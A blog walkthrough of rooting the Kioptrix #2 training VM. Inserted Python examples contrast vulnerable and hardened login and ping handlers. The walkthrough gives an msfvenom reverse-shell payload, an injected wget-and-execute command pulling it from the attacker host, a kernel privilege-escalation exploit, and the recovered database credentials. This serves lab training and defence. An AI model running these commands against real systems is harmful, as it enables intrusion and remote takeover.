As part of my series of blogs detailing how to compromise the Kioptrix series of boot2root challenges, today I’ll be documenting one method of compromising the second box.
Similar to box #1, in terms of available ports –
- CUPS (interesting..!)
- RPC Status
This box isn’t as straightforward as the last one: there isn’t a single vulnerable service we can exploit directly to get root. This version of the CUPS printer service isn’t remotely exploitable, and the SSH and MySQL instances don’t have easily guessable passwords.
Navigating to port 80 we see a very basic login page. After experimenting with basic login combinations I tried SQL injection as an attack vector and got lucky –
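To show why the login form falls over, here is an added example (not code from the original post or from the Kioptrix box) contrasting a login check built by string concatenation with a parameterized one. It uses an in-memory SQLite table seeded with the john / hiroshima credentials the post later recovers; the crafted username and password are constructed sample inputs, and the plaintext password storage mirrors the box rather than recommended practice.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build an in-memory users table seeded with the credentials from the post."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('john', 'hiroshima')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Vulnerable pattern: user input is spliced into the SQL text, so quotes in
    the input change the structure of the WHERE clause."""
    query = (
        "SELECT COUNT(*) FROM users "
        f"WHERE username='{username}' AND password='{password}'"
    )
    return conn.execute(query).fetchone()[0] > 0


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened form: placeholders keep the input as data, never as SQL syntax."""
    query = "SELECT COUNT(*) FROM users WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchone()[0] > 0


if __name__ == "__main__":
    db = make_db()
    tautology = "x' OR '1'='1"  # constructed sample input, not a real credential
    print("valid creds, vulnerable:", login_vulnerable(db, "john", "hiroshima"))
    print("valid creds, safe:      ", login_safe(db, "john", "hiroshima"))
    print("crafted input, vulnerable:", login_vulnerable(db, tautology, tautology))
    print("crafted input, safe:      ", login_safe(db, tautology, tautology))
```

The parameterized version returns False for the crafted input because SQLite compares the whole string, quotes included, against the stored username; the concatenated version returns True because the quotes terminate the literal and the rest of the input becomes part of the query.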
Which leads us to a panel where we can enter an IP address to ping a host, which immediately suggests a command injection vulnerability, as evidenced by –
Cool! Worth noting that this is a very old kernel version, which will come in handy later for exploitation.
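The ping panel above fails because the submitted string is spliced into a shell command line. As an added example (not code from the original post or the box), the block below places the vulnerable construction beside a hardened handler that validates the field as an IP address and invokes ping with an argument list and no shell, plus a small check a defender can run over logged form input to spot shell metacharacters. The sample inputs are constructed; `ping -c 3` is an assumed command shape.

```python
import ipaddress
import subprocess

# Characters that let a value break out of a shell command line.
SHELL_METACHARS = set(";|&`$()<>\n")


def build_ping_command_vulnerable(host: str) -> str:
    """Vulnerable pattern: the form value lands verbatim in a shell string."""
    return f"ping -c 3 {host}"


def validate_target(host: str) -> str:
    """Accept only a syntactically valid IPv4/IPv6 address; anything else is an error."""
    try:
        return str(ipaddress.ip_address(host.strip()))
    except ValueError:
        raise ValueError(f"not an IP address: {host!r}")


def build_ping_argv(host: str) -> list:
    """Hardened form: validated address passed as its own argv element, no shell involved."""
    return ["ping", "-c", "3", validate_target(host)]


def ping(host: str, timeout: float = 10.0) -> int:
    """Run the hardened command; returns ping's exit status (no network use in tests)."""
    return subprocess.run(build_ping_argv(host), capture_output=True, timeout=timeout).returncode


def looks_injected(host: str) -> bool:
    """Detection-side check for logged form input: any shell metacharacter is a red flag."""
    return any(c in SHELL_METACHARS for c in host)


if __name__ == "__main__":
    benign = "192.168.56.101"          # constructed sample input
    crafted = "; id ; uname -a"        # constructed sample input with metacharacters
    print(build_ping_command_vulnerable(crafted))   # the shell would run the extra commands
    print(build_ping_argv(benign))                  # ['ping', '-c', '3', '192.168.56.101']
    print(looks_injected(benign), looks_injected(crafted))
```

With argv-style execution the crafted value never reaches a shell, and the IP validation rejects it before a process is even started; the vulnerable builder, by contrast, hands the whole string to whatever shell the web app uses.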
Next step is to leverage this vulnerability to get a shell on the box. I used:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=53535 -f elf > /var/www/html/shell.elf
To create the shell (also started the associated handler in msfconsole) and:
; cd /tmp ; wget 192.168.56.102/shell.elf ; chmod +x shell.elf ; ./shell.elf
To connect back to our attacker machine.
Rooting the Box
At this point, we can run searchsploit on our attacker machine to find a kernel exploit to escalate our privileges to root.
Using the following command I found one which worked for me –
Which yielded the following –
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) – ‘sock_sendpage()’ Ring0 Privilege Escalation (5) | exploits/linux/local/9479.c
We put 9479.c into our /var/www/html directory, wget it onto the victim machine into the /tmp directory, compile it as normal with gcc sploit.c -o sploit and run it.
Once you’ve successfully got a shell on the box, catting the index.php file gives you some credentials for the database (john / hiroshima). Connecting to the “webapp” database and selecting * from the users table yields the following –
So now we’ve got valid app credentials for future usage.